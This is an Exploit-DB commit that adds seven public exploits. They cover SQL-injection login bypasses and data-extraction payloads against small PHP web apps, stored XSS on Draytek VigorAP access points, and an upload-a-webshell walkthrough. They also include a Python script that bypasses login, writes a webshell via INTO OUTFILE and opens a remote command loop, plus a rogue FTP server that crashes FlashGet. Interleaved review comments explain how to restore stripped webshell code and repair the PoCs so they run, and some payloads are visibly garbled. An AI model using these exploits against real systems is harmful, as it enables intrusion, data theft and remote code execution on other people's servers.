From c1eb769a9820fa757a1b577196f26fe3cd883811 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 8 May 2020 05:01:51 +0000
Subject: [PATCH] DB: 2020-05-08
7 changes to exploits/shellcodes
FlashGet 1.9.6 - Denial of Service (PoC)
Car Park Management System 1.0 - Authentication Bypass
Draytek VigorAP 1000C - Persistent Cross-Site Scripting
School File Management System 1.0 - 'username' SQL Injection
Online Clothing Store 1.0 - Arbitrary File Upload
Pisay Online E-Learning System 1.0 - Remote Code Execution
Online AgroCulture Farm Management System 1.0 - 'pid' SQL Injection
---
exploits/hardware/webapps/48436.txt | 147 ++++++++++++++++++++++++++++
exploits/php/webapps/48435.txt | 29 ++++++
exploits/php/webapps/48437.txt | 32 ++++++
exploits/php/webapps/48438.txt | 22 +++++
exploits/php/webapps/48439.txt | 74 ++++++++++++++
exploits/php/webapps/48440.txt | 51 ++++++++++
exploits/windows/dos/48434.py | 54 ++++++++++
files_exploits.csv | 7 ++
8 files changed, 416 insertions(+)
create mode 100644 exploits/hardware/webapps/48436.txt
create mode 100644 exploits/php/webapps/48435.txt
create mode 100644 exploits/php/webapps/48437.txt
create mode 100644 exploits/php/webapps/48438.txt
create mode 100644 exploits/php/webapps/48439.txt
create mode 100644 exploits/php/webapps/48440.txt
create mode 100755 exploits/windows/dos/48434.py
diff --git a/exploits/hardware/webapps/48436.txt b/exploits/hardware/webapps/48436.txt
new file mode 100644
index 000000000..0260e847c
--- /dev/null
+++ b/exploits/hardware/webapps/48436.txt
@@ -0,0 +1,147 @@
+# Title: Draytek VigorAP 1000C - Persistent Cross-Site Scripting
+# Author: Vulnerability Laboratory
+# Date: 2020-05-07
+# Vendor: https://www.draytek.com/
+# Software: https://www.draytek.com/products/vigorap-903/
+# CVE: N/A
+
+Document Title:
+===============
+Draytek VigorAP - (RADIUS) Persistent XSS Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2244
+
+
+Common Vulnerability Scoring System:
+====================================
+4
+
+
+Product & Service Introduction:
+===============================
+https://www.draytek.com/
+https://www.draytek.com/products/vigorap-903/
+
+
+
+Affected Product(s):
+====================
+Draytek
+[+] VigorAP 1000C | 1.3.2
+[+] VigorAP 700 | 1.11
+[+] VigorAP 710 | 1.2.5
+[+] VigorAP 800 | 1.1.4
+[+] VigorAP 802 | 1.3.2
+[+] VigorAP 810 | 1.2.5
+[+] VigorAP 900 | 1.2.0
+[+] VigorAP 902 | 1.2.5
+[+] VigorAP 903 | 1.3.1
+[+] VigorAP 910C | 1.2.5
+[+] VigorAP 912C | 1.3.2
+[+] VigorAP 918R Series | 1.3.2
+[+] VigorAP 920R Series | 1.3.0
+[+] All other VigorAP Series with Radius Module
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-05-07: Public Disclosure (Vulnerability Laboratory)
+
+
+Technical Details & Description:
+================================
+A persistent input validation vulnerability has been discovered in the
+official Draytek VigorAP product series application.
+The vulnerability allows remote attackers to inject own malicious script
+codes with persistent attack vector to compromise
+browser to web-application requests from the application-side.
+
+The persistent input validation web vulnerability is located in the
+username input field of the RADIUS Setting - RADIUS Server
+Configuration module. Remote attackers with limited access are able to
+inject own malicious persistent script codes as username.
+Other privileged user accounts execute on preview of the modules
+context. The request method to inject is POST and the attack
+vector is located on the application-side.
+
+Successful exploitation of the vulnerability results in session
+hijacking, persistent phishing attacks, persistent external
+redirects to malicious source and persistent manipulation of affected
+application modules.
+
+Vulnerable Module(s):
+[+] RADIUS Setting - RADIUS Server Configuration - Users Profile
+
+Vulnerable Input(s):
+[+] Username
+
+
+Proof of Concept (PoC):
+=======================
+The persistent input validation web vulnerabilities can be exploited by
+remote attackers with low privileged user account and low user interaction.
+For security demonstration or to reproduce the security vulnerability
+follow the provided information an steüs below to continue.
+
+
+PoC: Payload
+
+
+
+PoC: Vulnerable Source (http:/vigorAP.localhost:50902/home.asp)
+
+ + + + + + + + + + + + + +
UsernamePasswordConfirm PasswordConfigure
+
+ + + + + + + + +tr> +
NO.UsernameSelect
1test
2 +
+

+ +

+
+
+Reference(s):
+http:/vigorAP.localhost:50902/
+http:/vigorAP.localhost:50902/home.asp
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab -
+https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+Benjamin Kunz Mejri -
+https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
+
+
+--
+VULNERABILITY LABORATORY - RESEARCH TEAM
\ No newline at end of file
diff --git a/exploits/php/webapps/48435.txt b/exploits/php/webapps/48435.txt
new file mode 100644
index 000000000..431b45a16
--- /dev/null
+++ b/exploits/php/webapps/48435.txt
@@ -0,0 +1,29 @@
+# Exploit Title: Car Park Management System 1.0 - Authentication Bypass
+# Date: 2020-05-07
+# Exploit Author: Tarun Sehgal
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/car-park-management-system.zip
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+---------------------------------------------------------------------------------
+
+#parameter Vulnerable: phone and password
+#Injected Request
+#Below request will allow authentication bypass
+
+POST /Car%20Park%20Management%20System/proc/login.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 52
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/Car%20Park%20Management%20System/
+Cookie: PHPSESSID=d84agc0pp6qihtm7u775ftvukd
+Upgrade-Insecure-Requests: 1
+
+phone=' or '1'='1&password=' or '1'='1&Submit=Log+In
\ No newline at end of file
diff --git a/exploits/php/webapps/48437.txt b/exploits/php/webapps/48437.txt
new file mode 100644
index 000000000..56e9304bb
--- /dev/null
+++ b/exploits/php/webapps/48437.txt
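Review bot: The proof of concept in this advisory is empty as committed: nothing follows `PoC: Payload`, and the `PoC: Vulnerable Source` listing has lost its HTML tags (the table has collapsed to `UsernamePasswordConfirm PasswordConfigure` and `1test`), so a reader cannot tell what string was injected into the RADIUS username field or where it is reflected. This looks like tag stripping during extraction rather than an authoring choice, but the file should carry the exact POST body sent to the RADIUS user-profile form plus an HTML-escaped copy of the reflected markup. The reference URLs are also malformed (`http:/vigorAP.localhost:50902/` has a single slash), and the `# Software:` link points at the VigorAP 903 page while the title names the 1000C.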
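Review bot: The bypass puts `' or '1'='1` into both `phone` and `password`, which only works if proc/login.php concatenates the submitted password into the query unhashed; if that is the case it is a second finding (plaintext credential comparison, and likely plaintext storage) that the advisory should state explicitly, though the hunk does not quote the query. Quoting the vulnerable line from proc/login.php and naming the fix (prepared statements plus `password_verify()`) would make the entry reproducible from source. `# Vendor Homepage:` points at the sourcecodester front page rather than the product page.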
@@ -0,0 +1,32 @@
+# Exploit Title: School File Management System 1.0 - 'username' SQL Injection
+# Date: 2020-05-04
+# Exploit Author: Tarun Sehgal
+# Vendor Homepage: https://www.sourcecodester.com/php/14155/school-file-management-system.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/school-file-management-system.zip
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+---------------------------------------------------------------------------------
+
+#parameter Vulnerable: username
+# Injected Request
+POST /sfms/admin/index.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 173
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/sfms/admin/index.php
+Cookie: PHPSESSID=084gi60nhgqp5lpba3q6qngk9g
+Upgrade-Insecure-Requests: 1
+
+username=admin' OR 1 GROUP BY CONCAT(database(),(SELECT (CASE WHEN (7665=7665) THEN 1 ELSE 0 END)),0x3a,0x3a,version(),FLOOR(RAND(0)*2)) HAVING MIN(0)#&password=admin&login=
+
+
+
+//Comment
+Above request will print database name and MariaDB version.
\ No newline at end of file
diff --git a/exploits/php/webapps/48438.txt b/exploits/php/webapps/48438.txt
new file mode 100644
index 000000000..d1694393e
--- /dev/null
+++ b/exploits/php/webapps/48438.txt
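Review bot: The closing line `Above request will print database name and MariaDB version.` only holds if admin/index.php echoes the MySQL error text (display_errors on, or a die(mysqli_error()) in the login code), because the payload is a FLOOR(RAND(0)*2) duplicate-key error-based injection; that prerequisite should be stated, since on an install that hides errors the response is just a failed login. The request is unauthenticated, so the more important impact is that a plain `username=admin' OR 1#&password=x&login=` logs in as the first row of the users table; worth recording next to the version leak. The hunk does not show the vulnerable query; quoting it from admin/index.php would make the finding reproducible from source.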
@@ -0,0 +1,22 @@
+# Exploit Title: Online Clothing Store 1.0 - Arbitrary File Upload
+# Date: 2020-05-05
+# Exploit Author: Sushant Kamble and Saurav Shukla
+# Vendor Homepage: https://www.sourcecodester.com/php/14185/online-clothing-store.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-clothing-store_0.zip
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+
+#Vulnerable Page: Products.php
+
+#Exploit
+ Open Products.php and select any product
+ Fill details
+ Create php shell code with below script
+ &1'); ?>
+ Click on upload Image
+ Select php file
+ Click Submet
+ Access below URL:
+ http://localhost/online%20Clothing%20Store/Products/shell.php?e=dir
+ add system commands after e to execute it.
\ No newline at end of file
diff --git a/exploits/php/webapps/48439.txt b/exploits/php/webapps/48439.txt
new file mode 100644
index 000000000..e5d2f212d
--- /dev/null
+++ b/exploits/php/webapps/48439.txt
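Review bot: The shell snippet in step 4 reads only ` &1'); ?>`; everything from the PHP open tag through the `2>` redirect is missing, which is consistent with the `<?php ... 2>` span having been consumed as an HTML tag somewhere between the author and this file, so the PoC is not reproducible as committed and the full line (presumably `<?php system($_GET['e'].' 2>&1'); ?>`, to be confirmed against the original submission) should be restored. The steps also do not say what the upload handler checks, if anything (extension, MIME type, size), which is the detail a defender needs to write the fix. `Click Submet` should read `Click Submit`.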
@@ -0,0 +1,74 @@
+# Exploit Title: Pisay Online E-Learning System 1.0 - Remote Code Execution
+# Exploit Author: Bobby Cooke
+# Date: 2020-05-05
+# Vendor Homepage: https://www.sourcecodester.com/php/14192/pisay-online-e-learning-system-using-phpmysql.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/donbermoy/e-learningsystem_0.zip
+# Version: 1.0
+# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4
+# Description: Pisay Online E-Learning System v1.0 - SQLi Auth Bypass + Remote Code Execution (RCE)
+
+# Vulnerable Source Code:
+# /e-learningsystem/admin/login.php
+# 121 $email = trim($_POST['user_email']);
+# 122 $upass = trim($_POST['user_pass']);
+# 123 $h_upass = sha1($upass);
+# 132 $user = new User();
+# 134 $res = $user::userAuthentication($email, $h_upass);
+# /e-learningsystem/include/accounts.php
+# 3 class User {
+# 23 static function userAuthentication($email,$h_pass){
+# 25 $mydb->setQuery("SELECT * FROM `tblusers` WHERE `UEMAIL` = '". $email ."' and `PASS` = '". $h_pass ."'");
+# /e-learningsystem/admin/modules/lesson/edit.php
+# 6 @$id = $_GET['id'];
+# 7 if($id==''){
+# 10 $lesson = New Lesson();
+# 11 $res = $lesson->single_lesson($id);
+# /e-learningsystem/include/lessons.php
+# 4 class Lesson {
+# 5 protected static $tblname = "tbllesson";
+# 35 function single_lesson($id=0){
+# 37-38 $mydb->setQuery("SELECT * FROM ".self::$tblname." Where LessonID= '{$id}' LIMIT 1");
+
+import requests, sys, re
+
+requests.packages.urllib3.\
+disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
+
+def webshell(SERVER_URL):
+ try:
+ while True:
+ cmd = raw_input('C:\\ ')
+ command = {'cmd': cmd}
+ r2 = s.get(SERVER_URL+'../../../../webshell.php', params=command, verify=False)
+ response = r2.text
+ cleanResponse = response.replace('AAAAAAAAAAAAAAA', '')
+ cleanResponse = cleanResponse.replace('313371337', '')
+ print(cleanResponse)
+ except:
+ print("\r\nExiting.")
+ sys.exit(-1)
+
+if __name__ == "__main__":
+ if len(sys.argv) != 2:
+ print "(+) Usage: %s " % sys.argv[0]
+ print "(+) Example: %s 'https://10.0.0.3:443/e-learningsystem/'" % sys.argv[0]
+ sys.exit(-1)
+ SERVER_URL = sys.argv[1]
+ ADMIN_URL = SERVER_URL + 'admin/login.php'
+ LESSON_URL = SERVER_URL + 'admin/modules/lesson/index.php'
+ s = requests.Session()
+ s.get(SERVER_URL, verify=False)
+ payload1 = {'user_email': "boku' OR 1337=1337 LIMIT 1 -- PowerUp", 'user_pass': 'InstantTransmission', 'btnLogin': ''}
+ s.post(ADMIN_URL, data=payload1, verify=False)
+
+ payload2 = {'view': 'edit', 'id': '31337\' AND 1337=31337 union all select 313371337,"AAAAAAAAAAAAAAA",@@datadir,"AAAAAAAAAAAAAAA","AAAAAAAAAAAAAAA" -- kamahamaha'}
+ r1 = s.get(LESSON_URL, params=payload2, verify=False)
+ dirtyPath = str(re.findall(r'"Title" type="text" value=".*>', r1.text))
+ dataPath=re.sub('^.*"Title" type="text" value="', '', dirtyPath)
+ dataPath=re.sub('">.*$', '', dataPath)
+ dataPath=dataPath.replace('\\\\', '/')
+ xamppPath=re.sub('xampp.*', 'xampp', dataPath)
+ payload3 = {'view': 'edit', 'id': '31337\' AND 1337=31337 union all select 313371337,"AAAAAAAAAAAAAAA","","AAAAAAAAAAAAAAA","AAAAAAAAAAAAAAA" into OUTFILE \''+xamppPath+'/htdocs/webshell.php\' -- kamahamaha'}
+ print(payload3)
+ s.get(LESSON_URL, params=payload3, verify=False)
+ webshell(SERVER_URL)
\ No newline at end of file
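Review bot: In `payload3` the third UNION column, which is the content that `into OUTFILE` writes to `htdocs/webshell.php`, is the empty string `""`, so the script as committed writes an empty file and the later `params={'cmd': cmd}` requests in `webshell()` return nothing; given the `cmd` parameter and the `313371337`/`AAAA…` stripping, the PHP stub (presumably `<?php system($_GET['cmd']); ?>`) looks like it was lost to HTML tag stripping and should be restored from the original submission. The write path also depends on prerequisites the advisory does not state: the application's DB user needs the FILE privilege and `secure_file_priv` must not restrict writes under htdocs, which holds on a default XAMPP but not on a hardened MySQL. Minor: the bare `except:` in `webshell()` reports connection and HTTP errors as `Exiting.`; `except KeyboardInterrupt:` keeps the intent without hiding failures, and the mix of `print "..."` statements with `print(...)` calls and `raw_input` pins the script to Python 2, which a `# Python 2 only` header line should say.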
diff --git a/exploits/php/webapps/48440.txt b/exploits/php/webapps/48440.txt
new file mode 100644
index 000000000..4e79b1d9d
--- /dev/null
+++ b/exploits/php/webapps/48440.txt
@@ -0,0 +1,51 @@
+# Exploit Title: Online AgroCulture Farm Management System 1.0 - 'pid' SQL Injection
+# Google Dork: N/A
+# Date: 2020-05-07
+# Exploit Author: BKpatron
+# Vendor Homepage: https://www.sourcecodester.com/php/14198/online-agroculture-farm-management-system-phpmysql.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14198&title=Online+AgroCulture+Farm+Management+System+in+PHP%2FMySQL
+# Version: v1.0
+# Tested on: Win 10
+# CVE: N/A
+# my website: bkpatron.com
+
+# Discription:
+The Online AgroCulture Farm Management System v1.0 application is vulnerable to
+SQL injection via the 'pid' parameter on the review.php page.
+# vulnerable file : review.php
+http://localhost/AgroCulture/review.php?pid=27
+
+Parameter: pid (GET)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: pid=27' AND 5853=5853 AND 'EmvW'='EmvW
+
+ Type: error-based
+ Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+ Payload: pid=27' AND (SELECT 9739 FROM(SELECT COUNT(*),CONCAT(0x7170627071,(SELECT (ELT(9739=9739,1))),0x7176626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'tpnl'='tpnl
+
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: pid=27' AND (SELECT 7650 FROM (SELECT(SLEEP(5)))bwDl) AND 'IWff'='IWff
+
+ Type: UNION query
+ Title: Generic UNION query (NULL) - 8 columns
+ Payload: pid=-6157' UNION ALL SELECT NULL,NULL,CONCAT(0x7170627071,0x6d7a6346644349635a495a424c56644c51666866664553794e674764546a6c67747a69634749516a,0x7176626a71),NULL,NULL,NULL,NULL,NULL-- RXWN
+[INFO] the back-end DBMS is MySQL
+web application technology: PHP, Apache 2.4.39, PHP 7.2.18
+back-end DBMS: MySQL >= 5.0
+
+
+# Proof of Concept:
+http://localhost/vulnerability/ncn/AgroCulture/review.php?pid=sqli
+
+GET AgroCulture/review.php?pid=27 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie:PHPSESSID=gd27cb23t7m8o57giuvh0f8e7m
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+pid=-6157%27%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x7170627071,0x6d7a6346644349635a495a424c56644c51666866664553794e674764546a6c67747a69634749516a,0x7176626a71),NULL,NULL,NULL,NULL,NULL--%20RXWN
\ No newline at end of file
diff --git a/exploits/windows/dos/48434.py b/exploits/windows/dos/48434.py
new file mode 100755
index 000000000..89236db7f
--- /dev/null
+++ b/exploits/windows/dos/48434.py
@@ -0,0 +1,54 @@
+# Exploit Title: FlashGet 1.9.6 - Denial of Service (PoC)
+# Date: 2020-05-02
+# Author: Milad Karimi
+# Testen on: Kali Linux
+# Software Link: http://www.flashget.com/en/download.htm?uid=undefined
+# Version: 1.9.6
+# CVE : N/A
+
+#!/usr/bin/python
+
+from time import sleep
+from socket import *
+
+res = [
+ '220 WELCOME!! :x\r\n',
+ '331 Password required for %s.\r\n',
+ '230 User %s logged in.\r\n',
+ '250 CWD command successful.\r\n',
+ '257 "%s/" is current directory.\r\n' # <-- %s B0f :x
+ ]
+
+buf = 'A' * 332
+
+s = socket(AF_INET, SOCK_STREAM)
+s.bind(('0.0.0.0', 21))
+s.listen(1)
+print '[+] listening on [FTP] 21 ...\n'
+c, addr = s.accept()
+c.send(res[0])
+
+user = ''
+
+for i in range(1, len(res)):
+ req = c.recv(1024)
+ print '[*][CLIENT] %s' % (req)
+ tmp = res[i]
+ if(req.find('USER') != -1):
+ req = req.replace('\r\n', '')
+ user = req.split('\x20', 1)[1]
+ tmp %= user
+ if(req.find('PASS') != -1):
+ tmp %= user
+ if(req.find('PWD') != -1):
+ tmp %= buf
+ print '[*][SERVER] %s' % (tmp)
+ c.send(tmp)
+
+sleep(5)
+c.close()
+s.close()
+
+print '[+] DONE'
+
+# Discovered By : Milad Karimi
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 88b87f0df..ce1992889 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
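Review bot: The `# Proof of Concept:` request at the end of the file is malformed: the request line `GET AgroCulture/review.php?pid=27 HTTP/1.1` has no leading slash and carries the benign `pid=27`, while the actual UNION payload is appended after the headers as if it were a body, which a GET does not carry and review.php would never read. Move the payload into the request target, `GET /AgroCulture/review.php?pid=-6157%27%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(...),NULL,NULL,NULL,NULL,NULL--%20RXWN HTTP/1.1`, and drop the trailing `pid=` line. The PoC URL `http://localhost/vulnerability/ncn/AgroCulture/review.php?pid=sqli` also uses a different install path from `http://localhost/AgroCulture/review.php?pid=27` earlier in the file; the two should agree.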
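Review bot: `#!/usr/bin/python` sits on line 9, after the header comments, so it is not honoured even though the file is committed as mode 100755; a shell invoking it directly would fall back to running it as a shell script, so either move the shebang to line 1 or drop the executable bit. The listener is bound without `SO_REUSEADDR`, so a second run while the previous connection is in TIME_WAIT fails with EADDRINUSE; add `s.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)` before `s.bind(...)`. The response loop also assumes the client sends exactly USER, PASS, CWD, PWD in that order (it picks `res[i]` by turn number, not by the command received), and `req.split('\x20', 1)[1]` raises IndexError on a bare `USER` line; a comment such as `# assumes FlashGet sends USER, PASS, CWD, PWD in this order` would record the assumption the PoC depends on, since a different command sequence sends the oversized 257 reply at the wrong moment or not at all.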
@@ -6730,6 +6730,7 @@ id,file,description,date,author,type,platform,port
 48305,exploits/windows/dos/48305.py,"AbsoluteTelnet 11.12 - 'SSH1/username' Denial of Service (PoC)",2020-04-10,chuyreds,dos,windows,
 48342,exploits/hardware/dos/48342.txt,"Cisco IP Phone 11.7 - Denial of service (PoC)",2020-04-17,"Jacob Baines",dos,hardware,
 48402,exploits/windows/dos/48402.py,"VirtualTablet Server 3.0.2 - Denial of Service (PoC)",2020-05-01,"Dolev Farhi",dos,windows,
+48434,exploits/windows/dos/48434.py,"FlashGet 1.9.6 - Denial of Service (PoC)",2020-05-07,"Milad karimi",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
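Review bot: The new row records the author as `"Milad karimi"` with a lower-case surname while 48434.py itself says `Milad Karimi`, and the row's date 2020-05-07 differs from the file's `# Date: 2020-05-02`; if the CSV date is meant to be the publication date rather than the file's date that is fine, but the author spelling should match the file, `"Milad Karimi"`, since this index is what the search tooling displays.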
@@ -42666,3 +42667,9 @@ id,file,description,date,author,type,platform,port
 48431,exploits/ruby/webapps/48431.txt,"GitLab 12.9.0 - Arbitrary File Read",2020-05-06,KouroshRZ,webapps,ruby,
 48432,exploits/php/webapps/48432.txt,"YesWiki cercopitheque 2020.04.18.1 - 'id' SQL Injection",2020-05-06,coiffeur,webapps,php,
 48433,exploits/php/webapps/48433.txt,"MPC Sharj 3.11.1 - Arbitrary File Download",2020-05-06,SajjadBnd,webapps,php,
+48435,exploits/php/webapps/48435.txt,"Car Park Management System 1.0 - Authentication Bypass",2020-05-07,"Tarun Sehgal",webapps,php,
+48436,exploits/hardware/webapps/48436.txt,"Draytek VigorAP 1000C - Persistent Cross-Site Scripting",2020-05-07,Vulnerability-Lab,webapps,hardware,
+48437,exploits/php/webapps/48437.txt,"School File Management System 1.0 - 'username' SQL Injection",2020-05-07,"Tarun Sehgal",webapps,php,
+48438,exploits/php/webapps/48438.txt,"Online Clothing Store 1.0 - Arbitrary File Upload",2020-05-07,"Sushant Kamble",webapps,php,
+48439,exploits/php/webapps/48439.txt,"Pisay Online E-Learning System 1.0 - Remote Code Execution",2020-05-07,boku,webapps,php,
+48440,exploits/php/webapps/48440.txt,"Online AgroCulture Farm Management System 1.0 - 'pid' SQL Injection",2020-05-07,BKpatron,webapps,php,
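Review bot: Two of the new index rows disagree with the files they point to: 48438 lists the author as `"Sushant Kamble"` while 48438.txt credits `Sushant Kamble and Saurav Shukla`, and 48436's description names only the `Draytek VigorAP 1000C` while the advisory lists the 700 through 920R series and "all other VigorAP Series with Radius Module" as affected. Since this CSV is what search tooling shows instead of the file header, the rows should match it, e.g. `"Sushant Kamble and Saurav Shukla"` for 48438 and a description such as `"Draytek VigorAP Series - Persistent Cross-Site Scripting"` for 48436; 48439's `boku` versus the file's `Bobby Cooke` is presumably the author's handle and fine if that is the convention used elsewhere in the index.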